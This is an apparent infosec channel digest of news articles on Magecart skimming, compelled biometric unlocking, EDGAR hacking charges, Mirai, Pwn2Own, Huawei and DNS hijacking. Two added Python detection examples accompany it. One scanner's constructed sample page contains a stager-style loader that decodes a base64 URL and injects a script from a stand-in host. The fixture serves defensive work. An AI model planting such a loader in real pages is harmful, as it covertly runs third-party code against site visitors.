BlackBox (EN)




Database For cRyPtHoN™ INFOSEC
(For Reading Only - No Need Subscribe)
https://t.me/cRyPtHoN_INFOSEC_EN



New Magecart Group Hits Hundreds of Sites Via Supply Chain

Researchers have uncovered a twelfth Magecart group using tried-and-tested methods to disseminate its digital skimming code by infecting the supply chain.

RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.

This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.

This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.

“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”

RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.

This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.

Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.

Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.

📡@cRyPtHoN_INFOSEC_EN
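One defensive check the description above suggests, as an added example that is not code from the article or from RiskIQ: a scanner over a page's inline scripts that flags a base64 literal which decodes to an off-allowlist script URL sitting next to the runtime-injection calls needed to load it. The hostnames, the allowlist and the sample page are constructed; external script sources are returned so they can be fetched and scanned the same way, since a compromised ad tag carries the stager inside the script it serves.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# The runtime-injection calls a stager of the kind described above needs:
# decode a base64 string, build a <script> element, point it at the URL, attach it.
INJECTION_APIS = ("atob(", "createElement(", ".src=", "appendChild(", "insertBefore(")
# A quoted base64 literal long enough to hold a URL (short literals are noise).
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")


class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and the src of external scripts."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.inline = []
        self.external = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


def decode_url(literal):
    """Return the decoded string if the base64 literal is an http(s) URL, else None."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    parsed = urlparse(text)
    return text if parsed.scheme in ("http", "https") and parsed.netloc else None


def scan_script(body, allowed_hosts):
    """Flag base64-hidden script URLs that are injected at runtime and point off-allowlist."""
    compact = re.sub(r"\s+", "", body)  # tolerate 's.src = u' as well as 's.src=u'
    apis_used = [api for api in INJECTION_APIS if api in compact]
    if len(apis_used) < 3:  # need decode + element creation + src/attach to count
        return []
    findings = []
    for literal in B64_LITERAL.findall(compact):
        url = decode_url(literal)
        if url and urlparse(url).netloc.lower() not in allowed_hosts:
            findings.append({"url": url, "host": urlparse(url).netloc, "apis": apis_used})
    return findings


def scan_page(html, allowed_hosts):
    """Scan inline scripts; return (findings, external script srcs to fetch and scan next)."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for body in collector.inline:
        findings.extend(scan_script(body, allowed_hosts))
    return findings, collector.external


# Constructed sample page (not code from the article or from any real site):
# a stager-style loader beside a harmless base64 literal and an allowlisted ad tag.
STAGER_URL = "https://static.skimmer-example.invalid/loader.js"
ENCODED_URL = base64.b64encode(STAGER_URL.encode()).decode()
BENIGN_LITERAL = base64.b64encode(b"plain embedded text, not a URL").decode()
SAMPLE_HTML = f"""<html><head>
<script src="https://ads.example-agency.test/adtag.js"></script>
<script>
  var u = atob("{ENCODED_URL}");
  var s = document.createElement("script");
  s.src = u;
  document.head.appendChild(s);
</script>
<script>var note = "{BENIGN_LITERAL}";</script>
</head><body></body></html>"""
ALLOWED_HOSTS = {"shop.example.test", "ads.example-agency.test"}

if __name__ == "__main__":
    found, external = scan_page(SAMPLE_HTML, ALLOWED_HOSTS)
    for f in found:
        print("runtime-injected off-allowlist script:", f["url"], "via", ", ".join(f["apis"]))
    print("external scripts to fetch and scan next:", external)
```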


Police can’t compel biometric phone unlocking, rules judge

A Northern California federal judge ruled last week that police can’t force suspects to unlock their phones with their fingers, eyes or face, even with a warrant, because it amounts to the same type of self-incrimination as being forced to hand over your passcode.

If other courts apply her decision, it could set an important precedent in Fifth Amendment interpretation and the debate between compelling suspects to use “what they are” (i.e., forced use of their bodies) vs. “what they know” (i.e., forcing suspects to unlock their brains to get at their passcodes).

As Forbes reports, Judge Kandis Westmore ruled that compelled testimony is compelled testimony, regardless of whether it’s a passcode uttered aloud or a forced finger swipe. In this day and age, multiple forms of authentication unlock treasure troves of personal data, she wrote.

If a person cannot be compelled to provide a passcode because it is a testimonial communication, a person cannot be compelled to provide one’s finger, thumb, iris, face, or other biometric feature to unlock that same device.

Judge Westmore wrote the decision in denial of a warrant to police who were investigating alleged extortion in Oakland, California. The suspects allegedly used Facebook Messenger to threaten a man with the release of an embarrassing video unless he coughed up money.

Police had two suspects, but they wanted the go-ahead to compel anybody located on the same premises to unlock their devices, be it with a finger/thumb, face or iris. Judge Westmore denied the request for a search warrant on Fourth and Fifth Amendment grounds.

She agreed that the officers had probable cause to search the suspects’ property, but not to unlock any and all devices or compel people to do so. That would be a fishing expedition, she said. The government can’t be permitted to search and seize people’s devices just because they happen to be present during a lawful search.

With regards to the Fifth Amendment, it protects against suspects being forced to be witnesses against themselves. In this particular case, Judge Westmore wrote, the issue is whether the use of a suspect’s biometrics to unlock their device(s) is considered “testimonial” under the Fifth Amendment.

Courts are trying to keep pace with technology

The challenge facing courts is that “technology is outpacing the law,” the judge wrote. She referred to a recent case in which the US Supreme Court told courts that they needed to adopt rules that “take account of more sophisticated systems that are already in use or in development.”

The case she referred to, Carpenter v. United States, had to do with a Radio Shack robbery and the privacy of the phone location data that got the robber convicted. In June 2018, the Supreme Court ruled it unlawful for law enforcement and federal agencies to access cellphone location records without a warrant.

The decision said that courts “have an obligation to safeguard constitutional rights and cannot permit those rights to be diminished merely due to the advancement of technology.”

In the past, using biometrics to unlock devices has been compared to compelled fingerprinting or DNA swabs. Judge Westmore wrote that it should more rightly be thought of as a shortcut for a passcode, given that they both secure a device owner’s content – “pragmatically rendering them functionally equivalent.”

Her decision could be significant for both digital privacy and the law around search and seizure of connected devices. However, there’s no guarantee that it won’t be challenged or overturned. As it is, that law has continued to evolve, and there’s been a patchwork of contradictory findings.

A little history of finger forcing

Ever since Apple introduced Touch ID, many privacy and legal experts have said that biometric information such as fingerprints are like our DNA samples or our voice imprints: they’re simply a part of us. They don’t reveal anything that we know, meaning that they don’t count as testimony against ourselves.

Therefore, the prevailing thinking has gone, forcing suspects to press their fingers to get into a phone doesn’t breach their Fifth Amendment rights against forced self-incrimination.

It’s similar to when police with a search warrant demand a key to a lockbox that contains incriminating evidence, the Supreme Court has suggested: turning over the key is just a physical act, not “testimony” about something we know.

Over the years, there have been numerous court cases where that line of thinking has supported forced biometrics unlocking as well as people’s rights not to be forced into giving up passcodes. Here are just a few of those:

▶️ In 2014, when an Emergency Medical Services captain was charged with trying to strangle his girlfriend, a judge declared that cops could force phone unlocking with your fingerprint, but not with your passcode. Law enforcement in that case were after footage possibly recorded on video equipment in the suspect’s bedroom that might have shown the fight.

▶️ In 2015, a Pennsylvania federal district court confirmed Fifth Amendment protection for passcodes in an insider trading case.

▶️ In 2016, a Los Angeles judge forced a woman to unlock her iPhone with her finger so that police could get at evidence in a case concerning her alleged gang member boyfriend.

▶️ In October 2018, we saw the first known case of a suspect being forced to unlock his iPhone with his face.

The reasoning hasn’t always been applied that way, though. In 2016, a Philadelphia court said that a suspected child abuser would stay locked up indefinitely until he decrypted the drive that investigators thought contained abuse imagery, Fifth Amendment or no Fifth Amendment.

Similarly, there’s no guarantee that other courts will choose to apply this recent no-forced-biometrics ruling. We’ll be sure to keep an eye on how the courts continue to adapt in this age of connected devices, but for now, the safest thing to do if you care about your data privacy is likely the same as always: use a passcode instead of biometrics. The privacy of that approach is supported by a good deal of court rulings.


US lays charges for hacking SEC database for filing public company earnings

The US Securities and Exchange Commission (SEC) has charged hackers for illegally accessing the SEC’s EDGAR database to use in illegal trades after the same group had hacked press release services to make trades on non-public information.

The SEC today announced charges against nine people for hacking EDGAR to use information in illegal trades that took place in 2016.

The charges are against one Ukraine hacker, six traders from California, Ukraine, and Russia, and two companies.

The hacker and traders are alleged to have used EDGAR illegally in 2016 after hacking the press release services, PRNewswire Associates LLC and Business Wire, according to Bloomberg.

The accused allegedly gained access to the SEC’s computer networks through a “series of targeted cyber-attacks, including directory traversal attacks, phishing attacks, and infecting computers with malware”, according to the Justice Department.

EDGAR, or the Electronic Data Gathering, Analysis, and Retrieval system, contains millions of forms that companies submit before the information is made publicly available. People with access to this non-public information can profit from trades before the information is made public.

The SEC alleges that Ukrainian hacker Oleksandr Ieremenko hacked the SEC database to gain access to non-public earnings results between May and October 2016 that earned him and others involved at least $4.1 million.

The Justice Department today announced that 26-year-old Ieremenko and fellow Ukrainian national Artem Radchenko, 27, faced fraud and computer crime charges for illegally accessing pre-release earnings reports from the SEC.

The breaches highlight the difficulties the US has faced in preventing and punishing foreign hackers for attacking US financial markets.

“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said Assistant Attorney General Benczkowski.

“The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”

After stealing information from EDGAR, the hackers sent the earnings reports to a server in Lithuania. People involved in the scheme used the information to make trades before the information was made public.



Police can’t force you to unlock your phone by iris, face or finger

A US judge has ruled that law enforcement cannot force you to release your biometric mobile device lock.

A US judge has ruled that law enforcement does not have the right to force individuals to unlock their mobile devices through either their face or finger, whether or not a warrant is in play.

According to a judge presiding over a case in the US District Court for the Northern District of California, forcing a person to do so violates Fifth Amendment rights against self-incrimination.

Protections are already in place to protect against self-incrimination when it comes to passcodes for smartphones and so the judge, Kandis Westmore, has decided that biometric security deserves the same consideration in law.

As described by Forbes, "all logins are equal" now, no matter whether the means to access a device is achieved by revealing a passcode or using a body part.

This runs counter to how US legal professionals have previously viewed biometrics, including irises, faces, or fingerprints. Body parts for unlocking purposes were previously open season for the police, who were given the right to force a device to be unlocked through these means.

The decision came into being after Westmore reviewed a case relating to Facebook extortion. A victim received a demand for payment over Facebook Messenger on pain of an embarrassing video of them being released, and law enforcement requested a warrant to raid a suspect's property.

As well as obtaining the search warrant, the officers involved planned to force open any mobile device on the premises which was protected through biometric technology, such as Face ID or Touch ID.

In the ruling, the judge says that the government request to do so runs afoul of the Fourth and Fifth Amendments and, therefore, had to be denied.

While there were sufficient grounds to request a search warrant, Westmore said the overall request was "overbroad" and while two suspects were identified, "the request is neither limited to a particular person nor a particular device."

"Furthermore, the government's request to search and seize all digital devices at the subject premises is similarly overbroad," the ruling continues. "The government cannot be permitted to search and seize a mobile phone or other device that is on a non-suspect's person simply because they are present during an otherwise lawful search."

The Fifth Amendment states that no person "shall be compelled in any criminal case to be a witness against himself," and so, arguably, biometrics and passcodes -- the latter of which were once considered "testimonial" -- should be treated the same, since information found on a mobile device unlocked by either means could result in a criminal prosecution.

"There are other ways that the government might access the content that do not trample on the Fifth Amendment," the judge added, citing the possibility of obtaining Facebook Messenger data under the Stored Communications Act or through a warrant.

The judge says that "technology is outpacing the law," and this rings true worldwide. For now, at least, US citizens can enjoy a small victory for privacy. It does not mean, however, that the motion to treat biometrics in the same way as passcodes when it comes to forced device unlocking will not be challenged in future cases.



British Hacker-for-Hire Goes to Prison for Liberian Telecom, Deutsche Telekom Mirai Attack

The British professional hacker behind the 2016 Mirai attack on Lonestar, Liberia’s largest telecom company, was sentenced to two years and eight months in prison, announced the UK National Crime Agency. Daniel Kaye, also known as “BestBuy” and “Spiderman,” was arrested in 2017 in the UK on a European Arrest Warrant, and confessed in December 2018.

Kaye, a 30-year-old hacker-for-hire, launched a wave of DDoS attacks while living in Cyprus. The NCA found he was on a month-to-month contract with an official at Cellcom, a Lonestar competitor. He allegedly received $100,000 for his efforts.

The first series of attacks on Liberia’s Lonestar MTN began in October 2015 through rented botnet and stresser services. From September 2016, he used a Mirai botnet he had built by exploiting poor security configurations to compromise Dahua security cameras. The final attack, in November 2016 at 500 Gbps, took down Liberia’s entire internet network nationwide, leaving the company struggling for days with mitigation and recovery.

Following the attack, Lonestar lost customers, dealt with tens of millions of US dollars in losses and spent some 600,000 USD on attack prevention and mitigation.

The Mirai DDoS botnet also crippled Dyn’s DNS and Deutsche Telekom. Kaye also pleaded guilty to the attack on Deutsche Telekom after he was extradited to Germany, according to British authorities.

“Daniel Kaye was operating as a highly skilled and capable hacker-for-hire,” said Mike Hulett, Head of Operations at the NCCU. “His activities inflicted substantial damage on numerous businesses in countries around the world, demonstrating the borderless nature of cybercrime. The victims in this instance suffered losses of tens of millions of dollars and had to spend a large amount on mitigating action. Working in collaboration with international law enforcement partners played a key role in bringing Daniel Kaye to justice.”



Researchers Invited to Hack a Tesla at Pwn2Own 2019

Researchers can earn up to $300,000 and a car if they manage to hack a Tesla Model 3 at this year’s Pwn2Own competition, Trend Micro’s Zero Day Initiative (ZDI) announced on Monday.

Pwn2Own 2019, scheduled to take place on March 20-22 alongside the CanSecWest conference in Vancouver, Canada, introduces an automotive category for which a Tesla Model 3 will be brought on site.

White hat hackers can earn between $50,000 and $250,000 for demonstrating an exploit against a Tesla’s modem or tuner, Wi-Fi or Bluetooth components, infotainment system, gateway, autopilot, security system, and key fob (including the phone used as a key). Some of the targeted components are also eligible for a bonus of $50,000 or $100,000 for persistence and a CAN bus hack, respectively.

“Along with the prize money, the first-round winner in this category will win a Tesla Model 3 mid-range rear-wheel drive vehicle,” ZDI said.

In the virtualization category, Pwn2Own participants can target Oracle VirtualBox, VMware Workstation and ESXi, and Microsoft Hyper-V Client. The highest prize is for Hyper-V – up to $250,000 and a $30,000 bonus for a privilege escalation on the host.

In the web browsers category, hackers can earn tens and even hundreds of thousands of dollars for sandbox escapes, Windows kernel privilege escalations, and VM escapes. The targets are Chrome, Edge, Safari and Firefox.

The enterprise category includes Adobe Reader, Microsoft Office 365, and Microsoft Outlook. Finally, the server-side category’s only target is Windows RDP, for which hackers can earn $150,000.

“Most of our server side targets moved to our Targeted Incentive Program, so they no longer need to be included in Pwn2Own,” ZDI explained.

The prize pool for this year’s event exceeds $1 million, and that does not include the money offered for hacking a Tesla.

At last year’s Pwn2Own, participants took home less than $300,000 of the $2 million prize pool.



Huawei founder says company would not share user secrets

SHENZHEN, China (AP) — The founder of Huawei, in a new effort to allay Western security concerns, said Tuesday that the Chinese tech giant would not comply with Chinese government requests to disclose confidential information about its foreign customers and their communication networks.

Ren Zhengfei spoke in a rare meeting with foreign reporters as Huawei Technologies Ltd. counters concerns that threaten to hamper its access to global markets. Telecom carriers are preparing to spend billions of dollars on next-generation technology.

Ren’s comments were the 74-year-old former military engineer’s first public response to foreign accusations his company is controlled by the ruling Communist Party or is required to facilitate Chinese spying.

The United States, Australia, Japan and some other governments have imposed curbs on using Huawei technology over such concerns.

Asked how the company would respond to an official demand for confidential details about its customers and their operations, Ren said, “We would definitely say no to such a request.”

Asked whether Huawei might go to court, Ren said it would be up to Chinese authorities to “file litigation” if the company rejected such a request.

Ren said neither he nor the company have ever received a government request for “improper information” about anyone.

Huawei, the biggest global supplier of network equipment used by phone and internet companies, says it is employee-owned. Ren said no government entity or any other investor who isn’t a current or former employee owns “one cent of Huawei shares.”

Ren said Huawei has no research cooperation with the ruling party’s military wing, the People’s Liberation Army. He said the company also has no dedicated unit for military sales and he knew of no purchases of civilian technology by the PLA.

Ren is the father of Huawei’s chief financial officer, Meng Wanzhou, who was arrested Dec. 1 in Canada on U.S. charges related to possible violations of trade sanctions on Iran.

Ren said he misses his daughter but couldn’t discuss her case while it was before a court. However, he said Huawei obeys the law, including trade sanctions, in every country where it operates.



Fraudsters increasingly turning to Fuze cards to evade police

Street thieves who specialize in cashing out stolen credit and debit cards are increasingly using Fuze cards to conduct fraud and theft, the U.S. Secret Service has warned in a memo to companies in the financial sector.

Fraud rings use Fuze cards to avoid suspicions that could arise by carrying dozens of cards when attempting to draw cash or conduct purchases. Fuze cards allow them to store information for up to 30 stolen cards. The thief can simply use the controls on the Fuze card to swap through the card numbers.

Brian Krebs, a cybersecurity expert and investigative reporter, received a copy of the memo, which notes: “The transaction may also appear as a declined transaction but the fraudster, with the push of a button, is changing the card numbers being used.”

“Fraud rings often will purchase data on thousands of credit and debit cards stolen from hacked point-of-sale devices or obtained via physical card skimmers,” Krebs explains. “The data can be encoded onto any card with a magnetic stripe, and then used to buy high-priced items at retail outlets — or to withdrawn [sic] funds from ATMs (if the fraudsters also have the cardholder’s PIN).”

The Secret Service memo underscores that, “while this smart card technology makes up a small portion of fraudulent credit cards currently, investigators should be aware of the potential for significant increases in fraud loss amounts with the emergence of this smart card technology.”

Fuze Card, the company behind the technology, plans to extend Fuze functionality to include transactions with virtual currencies, like Bitcoin. When that happens, fraudsters might further increase their reliance on Fuze to conduct illicit transactions.

Last year, two independent security researchers discovered a grave flaw in the Fuze Bluetooth-pairing functionality which allowed anyone with brief physical access to tamper with the data stored “securely” on the cards. The researchers disclosed the flaw to Fuze Cards responsibly, holding off a public announcement until the company patched the bugs – which it did, in a timely fashion.



Iran linked to new DNS manipulation attack

Security researchers discover DNS hijacking attacks are targeting telecoms firms and governments and are being linked back to attackers in Iran.

Hackers have targeted DNS servers, hijacking them to redirect traffic in a bid to access credentials to be used in future attacks.

According to a blog post by researchers at FireEye, a suspected group of hackers backed by Iran has targeted government, telecommunications and internet infrastructure organisations across the Middle East and North Africa, Europe and North America.

Researchers said they believed an Iran-based group is behind the attacks, and that the victims include governments whose confidential information would have relatively little financial value but would be of interest to the Iranian government.

They added that the attacks have been carried out in waves between January 2017 and January 2019 and have had "a high degree of success".

"While we do not currently link this activity to any tracked group, initial research suggests the actor or actors responsible have a nexus to Iran," said FireEye researchers Muks Hirani, Sarah Jones and Ben Read.

Instead of using spear-phishing attacks to gain credentials, the hackers modified DNS records of victim organisations to redirect traffic to their own infrastructure.

The attackers used three different methods to carry out the DNS hijacking. The first involved the attacker logging into the DNS provider’s administration panel using previously compromised credentials; the DNS A record is then changed to intercept traffic.

The second form of attack uses a similar method to log into the admin panel, but this time the victim’s domain registrar account is accessed, and DNS NS records changed.

The third method sees hackers using a DNS redirector. This is an attacker operations box which responds to DNS requests. This box redirects victim traffic to attacker-maintained infrastructure.

In all cases, the hackers use a Let’s Encrypt certificate to fool users into thinking the connection is trustworthy.

Researchers said it was difficult to identify a single intrusion vector for each record change, and it is possible that the actor or actors are using multiple techniques to gain an initial foothold in each of the targets.

"While the precise mechanism by which the DNS records were changed is unknown, we believe that at least some records were changed by compromising a victim’s domain registrar account," said researchers.

Researchers said that this type of attack is difficult to defend against, "because valuable information can be stolen, even if an attacker is never able to get direct access to your organisation’s network".

The firm recommended that organisations implement multi-factor authentication on domain administration portals, validate changes to DNS A and NS records, and search for and revoke any malicious certificates related to their domain.

Marco Hogewoning, senior external relations officer at the RIPE NCC, told SC Media UK that the attack appears to combine many common vulnerabilities and the point of entry is quite simply poor password security.

"Using standard password security measures such as not repeating passwords will go a long way. The next point they exploit is people not actively monitoring their networks – using tools like RIPE Atlas could help monitor and raise red flags when things change unexpectedly. And finally, a lot of DNS attacks also rely on rerouting traffic. This is where routing security measures like Resource Public Key Infrastructure (RPKI) could go a long way in staving off such attacks," he said.

Chris Doman, security researcher at AlienVault, told SC that this is continuing activity that was earlier reported on by Cisco in November.

"The main intention behind these attacks seems to be able to bypass the encryption on traffic to certain websites, by issuing attacker-controlled security certificates," he said.

"It's interesting that attackers in Iran are pointed to as a possible source of these attacks. Attackers in Iran were linked to somewhat similar attacks back in 2011 that involved compromising a certificate authority to issue their own certificates," he said. "US-CERT have provided some advice on how to respond to these attacks, with the primary recommendation being to ensure you have two-factor authentication enabled on your domain name setting panels."
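The recommendations above (validate A and NS record changes, find and revoke certificates you did not request) as a baseline-diff monitor; this is an added example, not FireEye's or the article's code. The names, addresses, CA names and dates are constructed, and a real deployment would fill the observation and issuance feeds from resolver queries and certificate-transparency logs rather than from the inline constants.

```python
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class DnsSnapshot:
    """What resolvers return for a name at one point in time (constructed for this example)."""
    name: str
    a: frozenset   # IPv4 targets of the A record
    ns: frozenset  # authoritative name servers


@dataclass(frozen=True)
class CertIssuance:
    """One certificate issuance for a name, as a transparency log would show it (constructed)."""
    name: str
    issuer: str
    issued: date


def compare_snapshot(baseline, observed):
    """Alerts for A/NS drift between the approved baseline and a fresh observation.

    NS drift matches the registrar-account pattern (second method above) and is rated
    critical; a new A target matches the first method (DNS provider panel) and is rated high.
    """
    if baseline.name != observed.name:
        raise ValueError("snapshots are for different names")
    alerts = []
    ns_added, ns_removed = observed.ns - baseline.ns, baseline.ns - observed.ns
    if ns_added or ns_removed:
        alerts.append({
            "name": baseline.name, "kind": "NS", "severity": "critical",
            "detail": f"NS set changed: added {sorted(ns_added)}, removed {sorted(ns_removed)}",
        })
    a_added, a_removed = observed.a - baseline.a, baseline.a - observed.a
    if a_added:
        alerts.append({
            "name": baseline.name, "kind": "A", "severity": "high",
            "detail": f"A record now resolves to {sorted(a_added)}, not in baseline",
        })
    elif a_removed:
        alerts.append({
            "name": baseline.name, "kind": "A", "severity": "medium",
            "detail": f"baseline A targets {sorted(a_removed)} no longer returned",
        })
    return alerts


def unexpected_issuances(issuances, approved_issuers, since):
    """Certificates issued for our names since `since` by a CA the organisation does not use."""
    return [i for i in issuances if i.issued >= since and i.issuer not in approved_issuers]


def monitor(baselines, observed, issuances, approved_issuers, since):
    """Run both checks over every monitored name; returns a flat list of alert dicts."""
    alerts = []
    for name, base in baselines.items():
        obs = observed.get(name)
        if obs is None:
            alerts.append({"name": name, "kind": "RESOLVE", "severity": "medium",
                           "detail": "no observation for this name; query failed or name vanished"})
            continue
        alerts.extend(compare_snapshot(base, obs))
    for iss in unexpected_issuances(issuances, approved_issuers, since):
        alerts.append({"name": iss.name, "kind": "CERT", "severity": "high",
                       "detail": f"certificate issued by '{iss.issuer}' on {iss.issued}; "
                                 "revoke if it was not requested"})
    return alerts


# Constructed data: an approved baseline, a later observation and a CT-style issuance feed.
SAME_NS = frozenset({"ns1.example-gov.test", "ns2.example-gov.test"})
BASELINES = {
    "mail.example-gov.test": DnsSnapshot("mail.example-gov.test", frozenset({"203.0.113.10"}), SAME_NS),
    "vpn.example-gov.test": DnsSnapshot("vpn.example-gov.test", frozenset({"203.0.113.20"}), SAME_NS),
}
OBSERVED = {
    # A record moved to an address outside the organisation's range (method one)
    "mail.example-gov.test": DnsSnapshot("mail.example-gov.test", frozenset({"198.51.100.7"}), SAME_NS),
    # NS records replaced at the registrar (method two)
    "vpn.example-gov.test": DnsSnapshot("vpn.example-gov.test", frozenset({"203.0.113.20"}),
                                        frozenset({"ns1.redirector.invalid"})),
}
ISSUANCES = [
    CertIssuance("mail.example-gov.test", "Example Corporate CA", date(2018, 6, 1)),
    CertIssuance("mail.example-gov.test", "Let's Encrypt", date(2019, 1, 8)),
]
APPROVED_ISSUERS = {"Example Corporate CA"}
SINCE = date(2019, 1, 1)

if __name__ == "__main__":
    for alert in monitor(BASELINES, OBSERVED, ISSUANCES, APPROVED_ISSUERS, SINCE):
        print(f"[{alert['severity']}] {alert['name']} {alert['kind']}: {alert['detail']}")
```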


German antitrust watchdog to act against Facebook: report

(Reuters) - Germany's antitrust watchdog plans to order Facebook to stop gathering some user data, a newspaper reported on Sunday.

The Federal Cartel Office, which has been investigating Facebook since 2015, has already found that the social media giant abused its market dominance to gather data on people without their knowledge or consent.

The Bild am Sonntag newspaper said the watchdog will present the U.S. company with its ruling on what action it needs to take in the next few weeks.

A Facebook spokeswoman said the company disputes the watchdog's findings and will continue to defend this position.

The investigation is being closely watched amid mounting concerns over leaks of data on tens of millions of Facebook users, as well as the use of social media by foreign powers seeking to influence elections in the United States.

The German watchdog objects in particular to how Facebook acquires data on people from third-party apps - including its own WhatsApp and Instagram services as well as games and websites - and its tracking of people who are not members.

The paper said it is still not clear how strictly Facebook will have to comply with the German order, noting that the watchdog looks likely to set a deadline for compliance rather than insisting on immediate action.

(Reporting by Rene Wagner; Writing by Emma Thomasson; Editing by David Goodman)



Huawei fires sales manager who Poland charged with spying

LONDON (AP) — The Chinese tech company Huawei on Saturday announced it has fired a sales director who was arrested in Poland and charged with spying for China, saying he has brought the firm’s reputation “into disrepute.”

The company said it has “decided to terminate the employment of Mr. Wang Weijing, who was arrested on suspicion of breaking Polish law.”

Polish authorities said Friday they have arrested Wang, a Chinese citizen and former diplomat, along with a Polish cybersecurity expert who had held several top government cybersecurity jobs and also worked at the telecom company Orange.

Huawei said Wang’s actions “have no relation to the company” and that he was fired because “the incident in question has brought Huawei into disrepute.”

The arrest rekindled tensions between China and the West over cybersecurity concerns surrounding Huawei. It’s the world’s biggest maker of telecommunications equipment but has been banned in the U.S. since 2012 over fears it’s a security risk.

Earlier this week, Polish security agents searched the Warsaw offices of Huawei and Orange, Poland’s leading communications provider, seizing documents and electronic data. The homes of both men, also in Warsaw, were also searched, according to Internal Security Agency spokesman Stanislaw Zaryn.

Huawei had ambitious plans in Europe to roll out next-generation “5G” mobile networks. But some European governments and telecom companies are following the U.S. lead in questioning whether using Huawei for vital infrastructure for mobile networks could leave them exposed to snooping by the Chinese government.

“One thing is clear: this is another nail in the coffin of Huawei’s European ambitions,” said Thorsten Benner, director of the Global Public Policy Institute, a think tank.

Poland is Huawei’s headquarters for Central and Eastern Europe and the Nordic region.

Maciej Wasik, deputy head of Poland’s Special Services agency, said the operation that resulted in the arrests had been underway for a long time. He said “both carried out espionage activities against Poland.”

Zaryn told The Associated Press that prosecutors have charged the two men with espionage, but agents are continuing to collect evidence and interview witnesses. Further indictments are expected, he said.

Polish state television TVP reported that the men have proclaimed their innocence, but Zaryn could not confirm that. If convicted, they could face up to 10 years in prison each.

TVP identified the arrested Chinese man as Weijing W., saying he was a sales director in Poland at Huawei. It said he also went by the Polish first name of Stanislaw and had previously worked at the Chinese consulate in Gdansk.

A LinkedIn profile for a man named Stanislaw Wang appears to match details described by Polish television.

Wang’s resume said he worked at China’s General Consulate in Gdansk from 2006-2011 and at Huawei Enterprise Poland since 2011, where he was first director of public affairs and since 2017 the “sales director of public sector.” The resume said he received a bachelor’s degree in 2004 from the Beijing University of Foreign Studies.

State TV identified the Polish man as Piotr D., and said he was a high-ranking employee at the Internal Security Agency, where he served as deputy director in the department of information security, until 2011.

The Polish state news agency, PAP, said the man had also held top cybersecurity positions at the Interior Ministry and the Office of Electronic Communications, a regulatory body. It said, while at the Internal Security Agency, he was involved in building a mobile communications system for top Polish officials, and he was fired in 2011 amid a corruption scandal.

Geopolitical tensions over Huawei have intensified since Canada arrested a top executive last month at the request of U.S. authorities. Last year Australia, New Zealand and Japan instituted their own bans against using Huawei.

An official at the Chinese Embassy in Warsaw said Chinese envoys had urged Polish Foreign Ministry officials to arrange a consular visit with Wang “as soon as possible.”

Orange Poland told the AP on Friday it was cooperating with Polish security services in the case and had “handed over belongings of one of our employees” in Tuesday’s search of its offices. Orange told the AP it did not know if the suspicions against its employee were related to his work at Orange or his previous jobs.

Huawei’s chief financial officer, Meng Wanzhou, was arrested Dec. 1 in Canada in connection with U.S. accusations that the company violated restrictions on sales of American technology to Iran.

The United States wants Meng extradited to face charges that she misled banks about the company’s business dealings in Iran. She is out on bail in Canada awaiting extradition proceedings.

On Dec. 10, China detained former Canadian diplomat Michael Kovrig and Canadian entrepreneur Michael Spavor on vague national security allegations in apparent retaliation for Meng’s arrest.


Intel patches flaws that could lead to privilege escalation

Intel has been forced to release patches for five bugs in its systems, three of which enable escalation of privileges, allowing hackers access to infrastructure

Intel has been forced to release patches for five bugs in its systems, three of which enable escalation of privileges.

The three high-severity security vulnerabilities could result in privilege escalation. The first is found in Intel PROSet/Wireless WiFi Software, its wireless connection management tool. The flaw, CVE-2018-12177, gets a CVSS score of 7.8, according to an Intel security advisory.

"Improper directory permissions in the ZeroConfig service in Intel PROSet/Wireless WiFi Software before version 20.90.0.7 may allow an authorised user to potentially enable escalation of privilege via local access," said the advisory.

Intel has recommended that users update their systems to Intel PROSet/Wireless WiFi Software version 20.90.0.7 or later.

The second flaw (CVE-2018-18098) affects Intel SGX SDK and Intel SGX Platform Software. According to an advisory for this, "improper file verification in install routine for Intel(R) SGX SDK and Platform Software for Windows before 2.2.100 may allow an escalation of privilege via local access."

A patch has been issued for this, alongside one for a medium-severity flaw in the same products (detailed below).

A third vulnerability affects Intel System Support Utility for Windows. In a security advisory, Intel said that "Insufficient path checking in Intel(R) System Support Utility for Windows before 2.5.0.15 may allow an authenticated user to potentially enable an escalation of privilege via local access."

This flaw has been fixed in Intel System Support Utility for Windows v.2.5.0.15 and later.

Of the medium severity flaws, the first one focused on the Intel SGX SDK and Intel SGX Platform Software (CVE-2018-12155). The vulnerability could result in information disclosure.

"Data leakage in cryptographic libraries for Intel(R) IPP before 2019 update 1 release may allow an unprivileged user to cause information disclosure via local access," said the advisory.

